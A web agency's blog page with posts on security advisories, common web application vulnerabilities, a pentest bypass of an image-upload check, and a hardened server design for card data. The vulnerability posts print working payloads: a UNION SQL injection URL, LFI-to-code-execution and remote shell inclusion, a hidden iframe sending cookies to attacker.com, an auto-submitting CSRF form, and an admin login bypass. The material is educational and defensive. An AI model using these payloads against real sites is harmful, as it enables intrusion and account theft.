Hello! We are MTR Design and site making is our speciality. We work with UK based startups, established businesses, media companies and creative individuals and turn their ideas into reality. This is a thrill and we totally love it.

Stayin' secure with Web Security Watch

Author: Emil Filipov

Is your server/website secure? How do you *really* know? Web Security Watch can help you with getting on top of the publicly-released security advisories. A custom security feed just for you - how cool is that? read more ›

Is your server/website secure? How do you really know? Let me get back to this in a while. 

As you may be aware there is a ton of security advisories released by multiple sources every day. That's a true wealth of valuable information flowing out on the Internet. Being aware of the issues described in these advisories could make all the difference between being safe and getting hacked; between spending a few minutes to patch up, and spending weeks recovering lost data, reputation and customer trust. So who would *not* take advantage of the public security advisories, right?

Not really. See, there is the problem of information overflow. There is really a lot of sources of security information, each of them spewing dozens of articles every given day. To make it worse, very few of those articles are really relevant to you. So, if you do want to track them, you end up manually reviewing 99% of junk to get to the 1% that is really relevant to your setup. A lot of system/security administrators are spending several dull hours every week to go through reports that rarely concern them. Some even hire a full-time dedicated operators to process the information. Others simply don't care about the advisories, because the review process is too time-consuming. 

Well, we decided we can help with the major pains of the advisory monitoring process. So we built Web Security Watch (WSW) for this purpose. This website aggregates security advisories coming from multiple reputable sources (so you don't miss anything), groups them together (so you don't get multiple copies), and tags them based on the affected products/applications. The last action is particularly important, as tags allow you to filter just the items that you are interested in, e.g. "WordPress", "MySQL","Apache". What's more, we wrote an RSS module for WordPress, so you can subscribe to an RSS feed which only contains the tags you care about. A custom security feed just for you - how cool is that? Oh, and in case you didn't notice - the site is great for security research. And it's free.

Even though WSW is quite young, it already contains more than 4500 advisories, and the number grows every day. We will continue to improve the site functionality and the tagging process, which is still a bit rough around the edges. If you have any feature requests or suggestions, we would be really happy to hear them - feel free to use the contact form to get in touch with us with anything on your mind.

Now, to return to my original question. You can't really tell if your site/server is secure until you see it from the eyes of a hacker. And that requires some capable penetration testers. Even after you had the perfect penetration test performed by the greatest hackers in the world, however, you may end up being hacked and defaced by a script kiddie on the next week, due to vulnerability that just got disclosed publicly.

Which gets me to the basic truth about staying secure - security is not a state, it's a process. A large part of that process is staying current with the available security information, and Web Security Watch can help you with that part.

Web Application Security Basics

Author: Dimitar Ivanov

With the development of the computers and the communication technologies, the question of the security is becoming more and more pressing. Nowadays, every individual has some kind of presence on the Internet. This is true to a much greater extent for the companies – you simply cannot do business if you do not use Internet and/or web-based solutions – ERP applications, collaboration tools, you name it. read more ›

Some History

With the development of the computers and the communication technologies, the question of the security is becoming more and more pressing. Nowadays, every individual has some kind of presence on the Internet. This is true to a much greater extent for the companies - you simply cannot do business if you do not use Internet and/or web-based solutions - ERP applications, collaboration tools, you name it. This is raising many questions, such as "How secure is the information of my company?"; "How secure is the information of my customers?"; "Can someone access this information without authorization?"; "What do I need to do to protect myself from getting hacked?", etc. These questions are more relevant today than they were in the past. Twenty years ago very few people used computers, and even fewer dealt with information security. For those that did, this was a hobby or a profession, and they had a different way of thinking - if they found a vulnerability in a software or a system, they would report it to the owners, so that they can fix or mitigate it. I remember in the 90's there was a guy that hacked the name server of our university network through the finger daemon, and report it it immediately without doing any harm. Now, when literally everyone has Internet access, things are quite different. Anyone can download working exploits for recently published vulnerabilities; there are tools that can automate most of the tasks you would go through to hack a website; and do not forget Google and Shodan, which you can use to find vulnerable targets. This is making "hacking" (if you can call it that) very easy.

Why the Web Application security matters?

Under these circumstances, it is not hard to answer this question. Since virtually anyone has access to "hacking resources", the threat to the information security has increased enormously. With the migration to the Web applications, combined with the whole fuzz around the cloud computing, the focus of the security specialists and researchers has shifted. On one hand, it is harder to find a remote exploit for the operating systems. On the other hand, it is much easier to target and compromise a Web application. Often, the only thing you need to do that is a Web browser - take the LFI, RFI, File Upload, SQLi. If the application is vulnerable to LFI, you can include the process environment, which is going to be parsed by the PHP interpreter. If you change the User-Agent to a PHP code, it will be executed, giving you a remote command execution. If there is an RFI, you can include a Web shell from a remote server, and so on. Additionally, the vulnerabilities are announced publicly, sometimes even before there is a patch for them. Yeah, but

why on earth would someone attack my company?

Well, the motivation of the hacker can be different - industrial espionage; getting a stepping stone (hopping station) for carrying out attacks on other machines/networks; real or imaginary profit; revenge, hacktivism, etc. Anyone can target any company even for no particular reason, so

what could be the damage?

No matter the motivation of the attacker, their actions can cause huge financial losses, loss of reputation and trust, law suits. If a server is hacked and used as a hopping station to target other networks, it may be confiscated by the law enforcement, which can lead to additional losses. If its content is deleted, this can directly affect the productivity. A compromise of a server can lead to attacks on the internal networks of the company. That is why, we need to know what are

the Most Common Vulnerabilities in the Web Applications

The Open Web Application Security Project (OWASP) defines ten categories, which combine "the most serious risks for a broad array of organizations." Below, we will outline some of the most common vulnerabilities we have met in the course of our work. Probably the most common and the easiest one to exploit is

SQL Injection - Exploiting the Developer

Almost every dynamic Web application uses some kind of database backend. The content displayed to the application users is stored in the database and displayed in the browser, depending on the parameters passed by the underlying scripts to the backend. These parameter, however, depend on the user behavior, and can, therefore, be modified by them. This is the basic functionality of the Web application. The problems arise when the parameters are passed to the database without any sanitizing. This allows malicious users to close the legitimate query and pass their own queries to the database and get the results one way or another. In other words, SQL Injection exploit the assumptions, made by the application developers. For example, when the developer produced the following code:

$sql = '
FROM products
WHERE id = ' . $_GET['id'];

they wanted the script to query the database for products matching a given ID that is passed as a GET parameter. That is, if the visitors access http://target.com//vulnerable_script.php?id=1, they would see the details for the product with ID 1. The database query will look like this:

FROM products
WHERE id = 1

In this particular case, the developers assumed that the 'id' parameter would always be an integer. However, since the value of the 'id' parameter is passed to the database by the user without any filtering, a malicious user can input the following URL in the browser: http://target.com//vulnerable_script.php? id=1+union+select+0,1,concat_ws(user(),0x3a,database(),0x3a,version()),3,4,5,6-- In this case, the DB query will look like this:

FROM products
WHERE id = 1
union all
select 0,1,concat_ws(user(),0x3A,database(),0x3A,version()),3,4,5,6

Basically, this tells the database to display the information about the product with ID 1 and combine it with a set of data that contains the information about the user, the name of the database and the version of the database server. This information is selected in the third column, separated by colons (0x3A). To make this query, the attacker needs to know the number of the columns in the database. This information can be easily obtained by several requests that instruct the database to display the data, ordered by a particular column. This is a basic example for a regular Union SQL Injection. There are other flavors of SQLi - error-based, time-based blind boolean-based blind. Error-based SQL Injection attacks rely on extracting information from the errors, returned by the database. There is a nice introductory tutorial on error-based SQLi on Youtube. Surprisingly often, developers think that when they hide the errors from the output, they have resolved the vulnerability. Of course, this is not the case - the fact that you cannot see the data, returned by the database (union-based) or the errors (error-based), does not mean that the script is not vulnerable. In these cases, an attacker can use Blind SQL Injection to exfiltrate data, i.e. brute-force the data, based on boolean or time-based conditions. In these cases, you will pass queries that will inspect the responses of the database server and reconstruct the data. Of course, the attackers and pentesters are not stuck with the browser to exploit these vulnerabilities. There are numerous tools that will automate the process. The best one is sqlmap. Bernardo and Miroslav have done amazing job developing this tool. There are several things that can be done to prevent SQL Injection. The most widely used method is

filtering the user input

This method is the easiest to implement and if not implemented properly, it can be bypassed. There are numerous techniques to bypass defenses, based on input filtering - case tampering, white space tampering, encoding the queries. A lot better defense against SQLi is to use

parameterized queries

or "prepared statements". These are essentially templates for SQL queries, which contain spaces where the user input will go. When the filled-in template is passed to the database, the entire user input would be in the space allocated for it in the template. The database will execute the query from the template, instead of the query that may be supplied in the user input. Alternatively, developers can use

ORM (Object Relational Mapping)

This is a technique for object conversion, which converts the tables in the database to scalar variables, creating a virtual database. In practice, the ORM systems generate parameterized queries. The second most common vulnerability in Web applications is

File Inclusion - Exploiting the Functionality

This is another vulnerability that is fairly easy to find and exploit. Essentially, this is the ability to include files from the machine on which the application runs, or from a remote server, visible to this machine. The possibility to include different scripts is essential for the work of every application - this is how the application logic is abstracted or how different pages are displayed, depending on the user choice. Let's take a fairly simple website that has four pages: Home, News, About Us, Contacts. If the visitor accesses the Home page, the URL they will use would look like that:


In other words, the script accepts one parameter (page), which value specifies the page that is requested by the visitor. Let's assume that the script has the following code:

$page = $_GET['page'];
if(isset($page)) {
else {

The code is self-explanatory - the value of the GET parameter page is assigned to a variable 'page'. If its value is not NULL, the script includes the script with a name that is the same as the value. The problem with this code is that the page variable is created from the user input without any checks or filtering. Therefore, if we access the following URL:


the script will include and display the contents of the UNIX password file. This is a very simplified example of LFI. Often, programmers think that to secure the script above, they only need to add one little modification:

$page = $_GET['page'];
if(isset($page)) {
include("$page" . ".html");
else {

The only difference here is that a .html extension is added to the page that is included. However, by simply appending a null character (%00) to the URL, the attacker would still be able to include arbitrary files. This depends on the server configuration, the PHP version and may not work in all cases. In other cases, the developers use the file_exists() function, but this is functionality check, not a security one, because it does not limit the ability to include existing files. LFI vulnerabilities can easily lead to command execution in some cases. To achieve this, a malicious user can use the /proc file system, which is used in Linux as an interface to the kernel of the Operating System. Let's say that, again, we have a script that is vulnerable to LFI. To gain the ability to execute commands on the server, a malicious user can include /proc/self/environ. This is the environment of the current process - it contains the environmental variables for the running process. Besides the system environmental variables, it also contains the CGI variables (REMOTE_ADDR, HTTP_REFERER, HTTP_USER_AGENT, etc.) So, if the hacker changes the User-Agent header, passed to the server to a PHP script, the script will be parsed by the PHP interpreter and executed on the server. So far, we've looked into the ability to include files locally from the server, on which the vulnerable script is running. To include files from remote locations is not that different. Actually, if the server configuration allows the inclusion of remote scripts, and if the script is vulnerable, the only difference will be in the URL - the attacker would just have to use an address, such as


The file php_shell.txt will be included by the vulnerable script and parsed by the interpreter and executed locally on the server, effectively giving the attacker web shell access to the machine. Much like the SQL Injection vulnerabilities, the File Inclusion vulnerabilities are fairly easy to find and exploit. They are too a result of bad programming. Another such result is the

Arbitrary File Upload or Exploiting the Hostpitality

We have previously posted about these type of vulnerabilities, so we are going to skip this one here. The truth is that it is not just media upload forms that can be exploited. Any file upload script can be used. There may not even be an HTML form; the attackers can just make a request to the script. Even if we have a secure application, we should always be watching for

Unprotected Files or Exploiting the Negligence

People often make mistakes because of negligence. Developers and/or system administrators are not an exception to this rule. With the correct Google dorks we can find numerous configuration or backup files with database connect strings, scripts with improper content type that would be downloaded instead of executed in the browser, file managers with poor or no authentication, and so on. It may sound weird, but this is a fairly common mistake. Imagine that the developer of a web application has to make a quick change on the production server. They create a backup of the script that are about to change, and then leave the backup file with a .bak extension on the server. Even if the script does not contain sensitive data, such as usernames and passwords, it will still represent a security issue, because the backup file will most probably be downloaded by whoever accesses it. In another scenario, the Web application may use a Rich Text Editor, such as FCKEditor. There are lots of vulnerable versions of such editors that allow unauthenticated users to upload arbitrary files. The main reason for this security hole is the fact that people place files where they are not supposed to. To avoid this, you need to make sure that all files that should not be accessible over HTTP be placed outside the Web root directory. If for some reason this is not possible, these files should be protected properly. Probably the most common and overlooked vulnerability is

XSS or Exploiting the User

There are situations, in which the Web application allows us to get to the server through the user. The XSS (Cross-Site Scripting) vulnerabilities allow the attacker to inject custom scripts, which are executed in the context of the browser of the webapp user. This is due to improper validation of the output. There are two kinds of XSS vulnerabilities: persistent (stored) and non-peristent (reflected). Persistent XSS attacks store the injected code on the server and it is executed each time the page is displayed to the visitors. Here is an example scenario that uses stored XSS to get the cookie of the Web application user.

  • The attacker creates a script on their server that will collect the cookies.
  • The attacker injects the following hidden iframe in the application:
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location=”attacker.com/get_cookies.php?cookie=” + document.cookie)></iframe>
  • An authenticated user loads the page that contains the iframe.
  • The cookie is sent to the script, which writes it to a file or a database.
  • The attacker loads the cookie in their browser and is able to authenticate as the user.

Non-persistent XSS attacks are essentially the same; the only difference is that the injected code is not stored on the server. Instead, the attacker needs to trick the user to follow a link. Although XSS attacks usually attempt to steal cookies, this is not always the case. They may be used to target the passwords saved in the browser, and let's not forget BeEF. This means that setting the HttpOnly flag is not enough to protect the Web application users from XSS attacks. The best protection will be to validate and sanitizing the input and the output of the application alongside with tightened cookie security policies. A close relative of the XSS is the

XSRF or Exploiting the Browser

In its essence, the Cross-Site Request Forgery (CSRF or XSRF) attack is a hybrid between an XSS and a LFI attack. XSRF attacks are a way to issue commands from a user that the Web application trusts. Suppose we have a page in our Web application where the users can change their passwords. If the form is vulnerable to XSRF, the attacker can exploit this vulnerability to reset the password of the user. Here is how such an attack will take place:

  • The attacker creates their own form on their server:
    <body onLoad="javascript:document.password_form.submit()">
        <form action="https://target.com/admin/admin.php?" method=post name="password_form">
            <input type=hidden name=a value=change_password>
            <input type=password name=password1 VALUE="new_pass">
            <input type=password name=password2 VALUE="new_pass">
  • The attacker creates a seemingly empty HTML page, which contains a hidden iframe or an img tag that loads the form.
  • The attacker tricks the user to access the page (the user has to have an active session with the Web application).
  • The form submits the data to the server, effectively changing the password.

The only difficult thing in the attack is to trick the user to visit the page, while being logged in the application. This may be achieved with a spoofed e-mail, instant message, and so on. To protect users against such attacks, developers need to use anti-XSRF tokens in POST requests. Additionally, user actions, such as changing their passwords, should require an additional confirmation, usually, the users should enter the old passwords. Both CSS and CSRF attacks attempt to steal user accounts. This can also be achieved via attacking the

Authentication and Authorization or Exploiting the Implementation

We all know that assumptions are bad, but we still continue to assume. Fairly often the developers of the application make assumptions on how the authorization and the authentication of the users should work. These assumptions are sometimes wrong, and malicious users can conduct actions that do not always match whatever the developers have taken for granted. Let's take one of the most famous shopping cart scripts for an example. Here is how the administrators of the application log in to the administrative interface.

  • The administrator accesses http://target.com/catalog/admin.
  • The script redirects to the login.php script.
  • The administrator enters their login credentials.
  • The script checks the login credentials.
  • If they are correct, the administrator is logged in.
  • If they are not correct, the script asks the user for their login credentials again.

This is achieved by showing the login.php script to every unauthenticated user of the appl
ication. Let's see part of the code of the script. The login.php script contains the following code:


and here is the part of the application_top.php script that checks if the user is authenticated:

// redirect to login page if administrator is not yet logged in 
if (!tep_session_is_registered('admin')) { 
$redirect = false; 
$current_page = bassename($PHP_SELF); 
if ($current_page != FILENAME_LOGIN) { 
if (!tep_session_is_registered('redirect_origin')) { 
$redirect_origin = array('page' => $current_page, 'get' => $HTTP_GET_VARS); 
$redirect = true; 
if ($redirect == true) { 

What it basically does is check if the basename of $PHP_SELF is login.php. If it is login.php, then it serves the page; otherwise you will be redirected to login.php. Now, imaging that the attackers accesses the following URL:


The basename of $PHP_SELF is login.php, so the redirect is completely bypassed and the script renders the page, which, is of course, file_manager.php.

The attacker can also make a POST request to http://target.com/catalog/admin/administrators.php/login.php?action=insert and add themselves as a site administrator, upload a Web shell, and so on, and so forth.

Such vulnerabilities are due to mistakes in the programming. They are a bit harder to detect by the attackers, but they are extremely unpleasant, as they give access to the application to unauthenticated users.

To avoid these vulnerabilities, the logic of the application has to be very well planned, and the the implementation should be thoroughly tested.

Of course, there are other vulnerabilities , and attacks that are hybrids of the attacks described above. There is no post that can encompass them all. But we can safely say that these are the most common vulnerabilities and attacks on the Internet nowadays.

In a follow-up post we will discuss the defense and the penetration tests as part of the defense.

This article is translated to Serbo-Croatian language by Anja Skrba from Webhostinggeeks.com.

Published in: Development, Security

Poking with Media Upload Forms

Author: Dimitar Ivanov

Every pentester loves file upload forms - the ability to upload data on the server you are testing is what you always aim for. During a recent penetration test, I had quite the fun with a form that was supposed to allow registered users of the site to upload pictures and videos in their profiles. read more ›

What can I say about file upload forms? Every pentester simply loves them - the ability to upload data on the server you are testing is what you always aim for. During a recent penetration test, I had quite the fun with this form that was supposed to allow registered users of the site to upload pictures and videos in their profiles. The idea behind the test was to report everything as it was found, and the developers would fix it on the fly. The usual SQL injection and XSS issues they had no problems with, but the image upload turned to be a real challenge. When I got to the file upload form, it performed no checks whatsoever. I tried to upload a PHP shell, and a second later I was doing the happy hacker dance.

The challenge

So the developers applied the following fix:

$valid = false; if(preg_match('/^image/', $_FILES['file']['type'])) { $info = getimagesize($_FILES['file']['tmp_name']); if(!empty($info)) $valid = true; } elseif(preg_match('/^video/', $_FILES['file']['type'])) { $valid = true; } else { @unlink($_FILES['file']['tmp_name']); }
if($valid) { move_uploaded_file( $_FILES['file']['tmp_name'], 'images'.'/'.$_FILES['file']['name'] );

The code is now checking the type of the file and size of the images. However, there are a few issues with this check:

  • the type of the file is checked via the Content-Type header, which is passed to the script by the client, and therefore, can be easily modified;
  • the script is not checking the file extension, and you can still upload a .php file;
  • the check for the videos is only based on the Content-Type header.


It is fairly easy to evade this kind of protection of file upload forms. The easiest thing, of course, is to upload a PHP script, by changing the Content-Type header of the HTTP request to image/video. To do this, you need to intercept the outgoing HTTP request with a local proxy, such as Burp or Webscarab, but Tamper Data for Firefox will do just fine. You can also upload a valid image and insert PHP code in the EXIF. To do this, you can insert the code in the Comments field, e.g.:

$ exiftool -Comment='' info.php 1 image files updated

When you upload the image with a .php extension, it will be interpreted by the PHP interpreter, and the code will be executed on the server. Depending on the server configuration, you might be able to upload the image with .php.jpg extension. If the check for the extension is not done correctly, and if the server configuration allows it, you can still get code execution. Easy, eh?


So what can be done to prevent this? With a mixture of secure coding a some server-side tweaks, you can achieve a pretty secure file upload functionality.

  • [Code] Check for the Content-Type header. This may fool some script kiddies or less-determined attackers.
  • [Code] Check for the file extension. Replace .php, .py, etc. with, say, _php, _py, etc.
  • [Server] Disable script execution in the upload directory. Even if a script is uploaded, the web server will not execute it.
  • [Server] Disable HTTP access to the upload directory, that is if the files are only meant to be accessible only from scripts using the file system.Otherwise,  although the script will not be executed locally on the server, it could still be used by attackers in Remote File Inclusion attacks. If they target another server with an application that has an RFI vulnerability and allow_url_include is on, they can upload a script on your server and use it to get a shell on the vulnerable machine.


Developers often forget that relying on client-side controls is a bad thing. They should always code under the assumption that the application may be (ab)used by malicious user. Everything on the client side can be controlled and therefore, evaded. The more you check the user input, the better. And of course, the server configuration should be as hardened as possible.


Author: Dimitar Ivanov

A couple of years ago, one of our clients asked us to design a server setup that would host a PHP application for credit card storage. The application would have to be accessible from different location, only by their employees. read more ›

A couple of years ago, one of our clients asked us to design a server setup that would host a PHP application for credit card storage. The application would have to be accessible from different location, only by their employees.

Below is the design guide, produced by our team.

What we tried to do, was make the security as paranoid as possible, and still leave the system in a usable state. Of course, there is always something else that you can do to tighten the security even more, but this will lead to functional inconveniences which we'd rather not live with.

The principle we followed was "deny all, allow certain things." Therefore, the main design principles are:

  • Close all doors securely.
  • Open some doors.
  • Closely monitor the activity of the doors you opened.
  • Always be alert and monitor for suspicious activity of any kind (newly opened doors, unknown processes, unknown states of the system, etc)

Server installation and setup notes

  • Install a bare Linux, no services at all running ("netstat -lnp" must show no listening ports).
  • Install an intrusion detection system (which monitors system files for modifications).
  • Use the 'grsecurity' Linux kernel patches - they help against a lot of 'off-the-shelf' exploits
  • (door #1) Install the OpenSSH server (22 port), so that you can manage the server.
    • Disallow password logins, allow ONLY public keys, SSH v2.
    • Set PermitUserEnvironment to "yes".
    • Set a "KEYHOLDER" environmental variable in the ~/.ssh/authorized_keys file.
    • Send an e-mail if the KEYHOLDER variable is not set when a shell instance is started.
  • Set up an external DNS server in "/etc/resolv.conf" for resolving.
  • (door #2) Install a web server, for example Apache.
    • Leave only the barely needed modules.
    • Set up the vhost to work only with SSL, no plain HTTP (http://httpd.apache.org/docs/2.2/ssl/ssl_howto.html).
    • Purchase an SSL certificate for the server's vhost, so that clients can validate it.
    • Do not set up multiple vhosts on the server; this server will have only one purpose - to store and send data securely; don't be tempted to assign more tasks here.
    • Install a Web Application firewall (mod_security, etc.) - it will detect common web-based attacks. Monitor its logs.
    • Limit HTTP methods to good ones only, unexpected HTTP methods should get into the error logs and raise an eyebrow (generate alerts).
    • Disable directory listing in Apache.
    • Disable multiviews/content negotiation in Apache if your app does not rely on them.
  • Install an Application Firewall (e.g. AppArmor) - apps should not try to access resources they have no (legal) business with. For example, Apache should not try to read into /root/.
  • Install a MySQL server, bind it to address so that network usage isn't possible.
  • Install a mail server like Exim or Postfix but let it send only locally generated e-mails; there is no need to have a fully functional mail server, listening on the machine.
  • Firewall INPUT and FORWARD iptables chains completely (set default policy to DROP), except for the following simple rules:
    • INCOMING TCP connections TO port 22 FROM your IP address(es) - allow enough IP addresses, so that you don't lock yourself out;
    • INCOMING TCP connections TO port 443 FROM your clients' IP address(es) - the CRM application's IP address, etc.;
    • Allow INCOMING TCP, UDP and ICMP connections which are in state ESTABLISHED (i.e. initiated by the server or on the SSH port).
  • Log remotely, so if the system does get compromised, the attacker wouldn't be able to completely cover their traces. Copying over the log files on designated intervals is OK-ish, but real-time remote logging (like sysylog over SSL) is much better, as there would be no window where the logs could be erased/tampered with. Make an automatic checker which confirms that the remote logs, and the local logs are the same - an alarm bell should go off if they aren't.

Door #1 (SSH) can be considered closed and monitored:

  • It works only with few IP addresses.
  • Does not allow plain text logins, so brute-force attacks are useless.
  • A notification is sent when the door is opened by unauthorized users.

Door #2 (web server) must be taken special care of.

  • Review the access log of the server daily in regards to how many requests were made => if there are too many requests, then review the log manually and see which application/user made the requests; set a very low threshold as a start and increase it accordingly with time.
  • Review the error log of the server => send a mail alert if it has new data in it.

Consider using some kind of VPN (e.g. PPTP/IPSec/OpenVPN) as an added layer of network authentication. You can then bind the web server to the VPN IP address (so direct network access is completely disabled) and set the firewall to only allow the internal VPN IPs on port 443.

General server activity monitoring

  • Set the mail for "root" to go to your email address (crontab and other daemons send mail to "root").
  • Review the /var/log/syslog log of the server => send a mail alert if there is new data in it.
  • Do a "ps auxww" list of the processes => if there are unknown processes (as names, running user, etc) => send a mail alert to yourself.
  • Do a "netstat -lnp" list of the listening ports => mail alert if something changed here.
  • Test the firewall settings from an untrusted IP - the connections must be denied.

Finally, update the software on the server regularly. E-mail yourself an alert if there are new packages available for update.

Application Design Notes

The SSL (HTTPS) vhost will most probably run mod_php. When designing the application, the following must be taken care of:

  • Every user working with the system must be unique. Give unique login credentials to each of the employees, and let them know that their actions are being monitored personally, and they must not in any case give their login credentials to other employees.
  • Enforce strong passwords. There are tips in the OWASP Authentication Cheat Sheet.
  • If the employees work fixed hours, any kind of login during off hours should be regarded as a highly suspicious event. For example, if employees work 9am-6pm, any successful/unsuccessful login made  between 6pm - 9am  should trigger an alert.
  • Store any data in an encrypted form; use a strong encryption algorithm like AES-256.
  • Encrypt the data with a very long key.
  • Optional but highly recommended - do not store the key on the server. Instead, when the application is being started (for example when the server has just been rebooted), it must wait for the password to be entered. An example scenario is:
    • The application expects that the encryption key would be found in the file /dev/shm/ekey; /dev/shm is an in-memory storage location - it doesn't persist upon reboots;
    • Manually open the file /dev/shm/ekey-tmp with "cat > /dev/shm/ekey-tmp", enter the password there, then rename the file to "/dev/shm/ekey";
    • The application polls regularly for this file, reads it and then immediately deletes it;
    • Wait and verify that the file was deleted from /dev/shm.
    • Now your key is stored only in memory and is much more harder for an attacker to obtain it.
  • Set up the webapp access the MySQL server though an unprivileged user, restricted to a single database (*not* as MySQL's root).
  • Develop ACL lists on who can see what part of the information; split the information accordingly.
  • Every incoming GET, POST, SESSION or FILES request must be validated; do not allow bad input data.
  • Every unknown/error/bad state of the system (unable to verify input data, mysql errors, etc) must be mailed to you as a notification (do not mail details in a plain-text email, just a notification; then check it via SSH on the server).
  • Code should be clean and readable; do not over-engineer the system.
  • Make a log entry for EVERY action - both read and write ones; do NOT store any sensitive data in the logs.
  • Ensure that the application has a “safe mode” to which it can return if something truly unexpected occurs. If all else fails, log the user out and close the browser window.
  • Suppress error output when running in  production mode - debug info on errors should only be sent back to the visitor in *development* mode. Once the app is deployed debug output = leaking sensitive information.
  • Backup the data on an external server. The backup should be carried over a secure connection and kept encrypted.

So far so good. Up to now, we should have a system which is secure, logs everything, sends alerts and can store and retrieve sensitive data. The only question is - how do we authenticate against the system in a secure manner?

The best way to achieve this is to implement a two-factor authentication: a username/password and a client certificate.

  • Set up your own CA and issue certificates for your employees:
  • Keep the CA root certificate in a secure place!! Nobody must be able to get it, or else your whole certificate system will be compromised.
  • Set up the web server vhost to require a client certificate (How can I force clients to authenticate using certificates? from http://httpd.apache.org/docs/2.2/ssl/ssl_howto.html). This way, right after somebody opens up the login page, you would already know what client (employee) certificate they are using.
  • The client certificates must be protected with a password; this makes the security better - in order to log in, you must fist unlock your client certificate with its password, then open the login page and provide your own user/pass pair.
  • Consider using turning-test based login forms, e.g. http://community.citrix.com/display/ocb/2009/07/01/Easy+Mutli-Factor+Authentication . This will protect the passwords against keyboard sniffing.
  • The web server must
    • match each user/pass to their corresponding certificate;
    • have an easy mechanism for certificate revoking (disabling), in case you decide to part your way with an employee of yours.
  • Once logged in, create a standard PHP session and code as usual.
  • The most critical and important (and not very often) operations should be approved only once the user re-enters their password; this prevents replay attacks. For example, if you want to view the whole credit card number info (and you don't usually need this), the system will first ask you "Re-enter your password and I'll show you the information". Banks usually use this kind of protection method for every online transaction.
  • Expire sessions regularly - in a few hours or less of inactivity.
  • If possible, tie every session to its source IP address; that is - log the IP address upon login and don't allow other IP addresses to use this session ID. Note: some providers like AOL (used to) have transparent IP balancing proxies and with them the IP address of a single client may change in time; you cannot use this security method if you have such clients (try it).

Having a system like this should be protected against most attacks. Here are a couple of scenarios:

  • Brute-force attacks at the login page - they will not succeed because a user/pass + client certificate are required. Actually, without a certificate, the login page will not be displayed at all.
  • Someone steals a user laptop - they cannot use the certificate (even if they know the user/pass pair), because they don't know its password.
  • Someone sees a user entering their passwords - they cannot use them because they don't have your client certificate.
  • An employee starts to harvest the customer data - you have a rate limit of requests per employee, and also a general rate limit of requests to your database - you get an alert and investigate this further manually (you have full logs on the server).
  • Someone hacks into your server and quickly copies the database + PHP scripts onto a remote machine - they cannot use the data, because it is encrypted and you never stored the key in a file on the server - you enter the key every time manually upon server start-up.
  • Someone initiates a man-in-the-middle attack and sniffs your traffic - you are using only HTTPS and never accept/disregard SSL warnings in your browser - you are safe, the traffic cannot be read by third parties.
  • Someone totally gets control over a user computer (installs a key logger and copies your files) - you are doomed, nothing can help you, unless the compromised does not go unnoticed.
  • Someone really good hacks your server and spends a few days learning your system - if the intrusion detection system, and the custom monitor scripts didn't catch the hacker, and he spent days on your server trying to break your system, then you are in real trouble. This scenario has a very low probability; really smart hackers are usually not tempted in doing bad things.

The integration of such a secure database system could be easy. For example, if you have a customer with name XYZ, you can assign a unique number for this customer in your CRM system. Then you can use the secure storage to save sensitive data about this customer by referring to this unique number in the secure database system. It is true that your employees will have to work with one more interface, the interface of the secure database system, but this is the price of security - you have to sacrifice convenience for it.


Careful implementation of all of the above measures will further increase the security of the system, making the server extremely resilient against cyber attacks. Remember though, security is not a state - it's a process. Hire someone to take care of all security-related tasks on an ongoing basis.

Another point - as great as this all sounds on paper, it's the implementation that counts. Be careful with the implementation of the different services, safeguards and applications.

The weakest point in such a system would be the employee computer. A hacker who knows the basic layout of the server (and it follows the recommendations given so far) would focus on attacking the computer of some employee. Do not ignore the client side of the equation - this is quite often the weakest link in the chain.

We have plans to write a post about the client side too.